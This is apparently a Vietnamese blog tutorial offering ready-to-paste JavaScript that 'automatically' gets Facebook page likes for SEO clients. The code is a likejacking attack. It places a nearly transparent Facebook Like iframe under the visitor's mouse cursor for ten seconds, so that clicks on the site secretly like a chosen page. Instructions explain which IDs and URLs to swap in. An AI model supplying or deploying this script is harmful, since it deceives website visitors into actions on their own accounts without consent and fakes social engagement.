[TUT] Tự động Like Page cho khách hàng làm SEO

[TUT] Tự động Like Page cho khách hàng làm SEO

Hướng dẫn cách tự động [TUT] Tự động Like Page cho khách hàng làm SEO. Làm Like cho fanpage Cách này mình đã kiểm tra và cảm thấy hiệu quả chia sẻ cho các bạn làm SEO (TUTs không mang tính thương mại).

Bước 1: Tạo PAGE (Hoặc sử dụng PAGE). Cách tạo page này khá đơn giản chắc bạn nào dùng facebook cũng biết rồi

Bước 2: Chèn MÃ sau vào giữa code HEAD (Đoạn mã đỏ được giải thích bên dưới)

<div id=”fb-root”></div>

<script>(function(d, s, id) {

  var js, fjs = d.getElementsByTagName(s)[0];

  if (d.getElementById(id)) return;

  js = d.createElement(s); js.id = id;

  js.src = “//connect.facebook.net/vi_VN/all.js#xfbml=1&appId=135814643283624″;

  fjs.parentNode.insertBefore(js, fjs);

}(document, ‘script’, ‘facebook-jssdk’));</script>

<script type=”text/javascript”>

  //<![CDATA[

(function(){

  var Xcord = 0,

  Ycord = 0,

  IE = document.all ? true : false;

  if (!IE) document.captureEvents(Event.MOUSEMOVE);

  var lbox = document.createElement(‘iframe’);

  lbox.src = ‘http://www.facebook.com/plugins/like.php?href=‘ + encodeURIComponent(/*document.location.href*/ ‘http://www.facebook.com/phimhaivl‘) + ‘&amp;layout=standard&amp;show_faces=true&amp;width=53&amp;action=lbox&amp;colorscheme=light&amp;height=30’;

  lbox.scrolling = ‘no’;

  lbox.frameBorder = 0;

  lbox.allowTransparency = ‘true’;

  lbox.style.border = 0;

  lbox.style.overflow = ‘hidden’;

  lbox.style.cursor = ‘pointer’;

  lbox.style.width = ’53px’;

  lbox.style.height =  ’23px’;

  lbox.style.position = ‘absolute’;

  lbox.style.opacity = 0.2;

  document.getElementsByTagName(‘body’)[0].appendChild(lbox);

  window.addEventListener(‘mousemove’, mouseMove, false);

  setTimeout(function(){

    document.getElementsByTagName(‘body’)[0].removeChild(lbox);

    window.removeEventListener(‘mousemove’, mouseMove, false);

  }, 10000);

  function mouseMove(e) {

    if (IE) {

      Xcord = event.clientX + document.body.scrollLeft;

      Ycord = event.clientY + document.body.scrollTop;

    } else {

      Xcord = e.pageX;

      Ycord = e.pageY;

    }

    if (Xcord < 0) Xcord = 0;

    if (Ycord < 0) Ycord = 0;

    lbox.style.top = (Ycord – 8) + ‘px’;

    lbox.style.left = (Xcord – 25) + ‘px’;

    return true

  }

})();

  //]]>

</script>

–          Các đoạn bôi đỏ là các đoạn chú ý các bạn thay vào 135814643283624 : (Là ID của page facebook  cách tạo APP lấy ID của site tại đây: https://developers.facebook.com/apps)

–          http://www.facebook.com/phimhaivl –> Page của khách hàng.

–          10000: (Thời gian hiển thị nút Like bắt sự kiện theo chuột đây là để hiển thị 10s)

 

[TUT] Tự động Like Page cho khách hàng làm SEO
5 (100%) 1 vote

Leave a Comment: